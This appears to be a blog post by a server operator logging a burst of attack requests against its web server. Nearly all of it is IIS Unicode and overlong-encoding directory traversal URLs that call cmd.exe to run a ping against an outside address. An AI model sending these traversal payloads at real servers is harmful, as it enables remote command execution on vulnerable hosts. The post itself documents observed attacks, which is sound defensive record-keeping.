IIS Hacks Continued
The following attempts to exploit the server occurred recently, originating from a Chinese network.
The first thing these dummies should do is a whois search, so at least they know if they dealing with a Windows box.
!!!! 38 possible successful probes
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/phpmyadmin/index.php HTTP Response 200
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2 HTTP
Response 200
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+222.36.47.2
HTTP Response 200
More IIS Hacks
SSH Scams Update - Hello from Podlaskie
|